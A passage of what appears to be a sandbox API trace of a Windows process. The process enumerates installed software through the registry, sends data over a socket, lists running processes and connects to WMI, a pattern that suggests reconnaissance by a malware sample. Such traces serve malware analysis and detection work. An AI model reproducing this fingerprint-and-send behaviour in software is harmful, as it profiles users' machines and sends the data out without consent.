lpData=0x0, lpcbData=0x43eb80*=0x1e) returned 0x0 [0278.739] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27afa04, lpcbData=0x43eb80*=0x1e | out: lpType=0x43eb84*=0x1, lpData="16.0.4266.1003", lpcbData=0x43eb80*=0x1e) returned 0x0 [0278.739] RegCloseKey (hKey=0x484) returned 0x0 [0278.740] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{90160000-008C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.740] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x5c) returned 0x0 [0278.740] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27afdc4, lpcbData=0x43eb80*=0x5c | out: lpType=0x43eb84*=0x1, lpData="Office 16 Click-to-Run Localization Component", lpcbData=0x43eb80*=0x5c) returned 0x0 [0278.740] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x1e) returned 0x0 [0278.740] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27afee8, lpcbData=0x43eb80*=0x1e | out: lpType=0x43eb84*=0x1, lpData="16.0.4266.1003", lpcbData=0x43eb80*=0x1e) returned 0x0 [0278.740] RegCloseKey (hKey=0x484) returned 0x0 [0278.740] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4503575", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.741] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x68) returned 0x0 [0278.741] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b027c, lpcbData=0x43eb80*=0x68 | out: lpType=0x43eb84*=0x1, lpData="Update for Microsoft .NET Framework 4.8 (KB4503575)", lpcbData=0x43eb80*=0x68) returned 0x0 [0278.741] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x4) returned 0x0 [0278.741] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b03b8, lpcbData=0x43eb80*=0x4 | out: lpType=0x43eb84*=0x1, lpData="1", lpcbData=0x43eb80*=0x4) returned 0x0 [0278.741] RegCloseKey (hKey=0x484) returned 0x0 [0278.741] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.741] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x7e) returned 0x0 [0278.741] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b06e4, lpcbData=0x43eb80*=0x7e | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", lpcbData=0x43eb80*=0x7e) returned 0x0 [0278.741] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x1e) returned 0x0 [0278.742] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b0850, lpcbData=0x43eb80*=0x1e | out: lpType=0x43eb84*=0x1, lpData="9.0.30729.6161", lpcbData=0x43eb80*=0x1e) returned 0x0 [0278.742] RegCloseKey (hKey=0x484) returned 0x0 [0278.742] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.742] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x7c) returned 0x0 [0278.742] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b0be4, lpcbData=0x43eb80*=0x7c | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", lpcbData=0x43eb80*=0x7c) returned 0x0 [0278.742] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x16) returned 0x0 [0278.742] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b0d48, lpcbData=0x43eb80*=0x16 | out: lpType=0x43eb84*=0x1, lpData="11.0.61030", lpcbData=0x43eb80*=0x16) returned 0x0 [0278.742] RegCloseKey (hKey=0x484) returned 0x0 [0278.742] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.742] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x76) returned 0x0 [0278.743] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b10c4, lpcbData=0x43eb80*=0x76 | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", lpcbData=0x43eb80*=0x76) returned 0x0 [0278.743] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x16) returned 0x0 [0278.743] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b1220, lpcbData=0x43eb80*=0x16 | out: lpType=0x43eb84*=0x1, lpData="11.0.61030", lpcbData=0x43eb80*=0x16) returned 0x0 [0278.743] RegCloseKey (hKey=0x484) returned 0x0 [0278.743] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.743] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x7a) returned 0x0 [0278.743] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b1594, lpcbData=0x43eb80*=0x7a | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", lpcbData=0x43eb80*=0x7a) returned 0x0 [0278.743] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x1a) returned 0x0 [0278.743] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b16f8, lpcbData=0x43eb80*=0x1a | out: lpType=0x43eb84*=0x1, lpData="11.0.61030.0", lpcbData=0x43eb80*=0x1a) returned 0x0 [0278.743] RegCloseKey (hKey=0x484) returned 0x0 [0278.743] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.744] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x7a) returned 0x0 [0278.744] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b1a7c, lpcbData=0x43eb80*=0x7a | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", lpcbData=0x43eb80*=0x7a) returned 0x0 [0278.744] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x1a) returned 0x0 [0278.744] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b1be0, lpcbData=0x43eb80*=0x1a | out: lpType=0x43eb84*=0x1, lpData="12.0.30501.0", lpcbData=0x43eb80*=0x1a) returned 0x0 [0278.744] RegCloseKey (hKey=0x484) returned 0x0 [0278.744] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.744] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x78) returned 0x0 [0278.744] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b1f64, lpcbData=0x43eb80*=0x78 | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219", lpcbData=0x43eb80*=0x78) returned 0x0 [0278.745] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x16) returned 0x0 [0278.745] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b20cc, lpcbData=0x43eb80*=0x16 | out: lpType=0x43eb84*=0x1, lpData="10.0.40219", lpcbData=0x43eb80*=0x16) returned 0x0 [0278.745] RegCloseKey (hKey=0x484) returned 0x0 [0278.745] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.745] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.746] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.746] RegCloseKey (hKey=0x484) returned 0x0 [0278.746] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.746] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.746] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.746] RegCloseKey (hKey=0x484) returned 0x0 [0278.746] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.746] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.746] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.746] RegCloseKey (hKey=0x484) returned 0x0 [0278.747] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.747] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.747] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.747] RegCloseKey (hKey=0x484) returned 0x0 [0278.747] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.747] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.747] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.747] RegCloseKey (hKey=0x484) returned 0x0 [0278.747] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.748] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.748] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.748] RegCloseKey (hKey=0x484) returned 0x0 [0278.748] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.748] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.748] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.748] RegCloseKey (hKey=0x484) returned 0x0 [0278.748] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.748] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x7c) returned 0x0 [0278.748] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b3180, lpcbData=0x43eb80*=0x7c | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", lpcbData=0x43eb80*=0x7c) returned 0x0 [0278.748] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x16) returned 0x0 [0278.749] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27b32e4, lpcbData=0x43eb80*=0x16 | out: lpType=0x43eb84*=0x1, lpData="12.0.21005", lpcbData=0x43eb80*=0x16) returned 0x0 [0278.749] RegCloseKey (hKey=0x484) returned 0x0 [0278.749] RegCloseKey (hKey=0x480) returned 0x0 [0278.760] CoCreateGuid (in: pguid=0x43e86c | out: pguid=0x43e86c*(Data1=0xc8d3c4de, Data2=0xc5e0, Data3=0x4f0a, Data4=([0]=0xbc, [1]=0xec, [2]=0xa6, [3]=0x6b, [4]=0x9f, [5]=0x9f, [6]=0x1e, [7]=0x90))) returned 0x0 [0278.760] CoCreateGuid (in: pguid=0x43e7b0 | out: pguid=0x43e7b0*(Data1=0x2cb3481c, Data2=0x56cc, Data3=0x4783, Data4=([0]=0xab, [1]=0x9d, [2]=0x60, [3]=0x67, [4]=0x8d, [5]=0xb8, [6]=0x7e, [7]=0x86))) returned 0x0 [0278.762] send (s=0x264, buf=0x27b4557*, len=1530, flags=0) returned 1530 [0278.762] recv (in: s=0x264, buf=0x267e0bc, len=8192, flags=0 | out: buf=0x267e0bc*) returned 125 [0278.855] GetCurrentProcessId () returned 0xfc8 [0278.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x35914e0, Length=0x20000, ResultLength=0x43eac0 | out: SystemInformation=0x35914e0, ResultLength=0x43eac0*=0xc458) returned 0x0 [0278.875] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaac | out: puCount=0x43eaac*=0x2) returned 0x0 [0278.875] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43eaa8*=0x0, pszText=0x0 | out: puBuffLength=0x43eaa8*=0xf, pszText=0x0) returned 0x0 [0278.875] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43eaa8*=0xf, pszText="00000000000000" | out: puBuffLength=0x43eaa8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0278.875] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea34 | out: ppv=0x43ea34*=0x500344) returned 0x0 [0278.875] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea2c | out: pAptType=0x43ea2c*=1) returned 0x0 [0278.875] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea30 | out: ppvObject=0x43ea30*=0x0) returned 0x80004002 [0278.875] IUnknown:Release (This=0x500344) returned 0x1 [0278.876] CoGetClassObject (in: rclsid=0x5aa334*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e650 | out: ppv=0x43e650*=0x56e34c0) returned 0x0 [0278.876] WbemLocator:IUnknown:QueryInterface (in: This=0x56e34c0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e868 | out: ppvObject=0x43e868*=0x0) returned 0x80004002 [0278.876] WbemLocator:IClassFactory:CreateInstance (in: This=0x56e34c0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e874 | out: ppvObject=0x43e874*=0x56e9ec0) returned 0x0 [0278.876] WbemLocator:IUnknown:Release (This=0x56e34c0) returned 0x0 [0278.876] WbemLocator:IUnknown:QueryInterface (in: This=0x56e9ec0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e494 | out: ppvObject=0x43e494*=0x56e9ec0) returned 0x0 [0278.876] WbemLocator:IUnknown:QueryInterface (in: This=0x56e9ec0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e448 | out: ppvObject=0x43e448*=0x0) returned 0x80004002 [0278.876] WbemLocator:IUnknown:AddRef (This=0x56e9ec0) returned 0x3 [0278.877] WbemLocator:IUnknown:QueryInterface (in: This=0x56e9ec0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43dda4 | out: ppvObject=0x43dda4*=0x0) returned 0x80004002 [0278.877] WbemLocator:IUnknown:QueryInterface (in: This=0x56e9ec0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dd54 | out: ppvObject=0x43dd54*=0x0) returned 0x80004002 [0278.877] WbemLocator:IUnknown:QueryInterface (in: This=0x56e9ec0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dd60 | out: ppvObject=0x43dd60*=0x0) returned 0x80004002 [0278.877] CoGetContextToken (in: pToken=0x43ddc0 | out: pToken=0x43ddc0) returned 0x0 [0278.877] CoGetContextToken (in: pToken=0x43e1d4 | out: pToken=0x43e1d4) returned 0x0 [0278.877] WbemLocator:IUnknown:QueryInterface (in: This=0x56e9ec0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e254 | out: ppvObject=0x43e254*=0x0) returned 0x80004002 [0278.877] WbemLocator:IUnknown:Release (This=0x56e9ec0) returned 0x2 [0278.877] WbemLocator:IUnknown:Release (This=0x56e9ec0) returned 0x1 [0278.877] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0278.877] CoGetContextToken (in: pToken=0x43e7b4 | out: pToken=0x43e7b4) returned 0x0 [0278.877] WbemLocator:IUnknown:QueryInterface (in: This=0x56e9ec0, riid=0x43e884*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e880 | out: ppvObject=0x43e880*=0x56e9ec0) returned 0x0 [0278.877] WbemLocator:IUnknown:AddRef (This=0x56e9ec0) returned 0x3 [0278.877] WbemLocator:IUnknown:Release (This=0x56e9ec0) returned 0x2 [0278.877] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea10 | out: puCount=0x43ea10*=0x2) returned 0x0 [0278.877] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=8, puBuffLength=0x43ea0c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea0c*=0xf, pszText=0x0) returned 0x0 [0278.877] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=8, puBuffLength=0x43ea0c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea0c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0278.877] CoCreateInstance (in: rclsid=0x6c313734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6c313794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x43e8bc | out: ppv=0x43e8bc*=0x56e9e80) returned 0x0 [0278.877] WbemLocator:IWbemLocator:ConnectServer (in: This=0x56e9e80, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x43e95c | out: ppNamespace=0x43e95c*=0x5ada30) returned 0x0 [0278.885] WbemLocator:IUnknown:QueryInterface (in: This=0x5ada30, riid=0x6c3135b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e7e0 | out: ppvObject=0x43e7e0*=0x58dd8c) returned 0x0 [0278.885] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x58dd8c, pProxy=0x5ada30, pAuthnSvc=0x43e830, pAuthzSvc=0x43e82c, pServerPrincName=0x43e824, pAuthnLevel=0x43e828, pImpLevel=0x43e818, pAuthInfo=0x43e81c, pCapabilites=0x43e820 | out: pAuthnSvc=0x43e830*=0xa, pAuthzSvc=0x43e82c*=0x0, 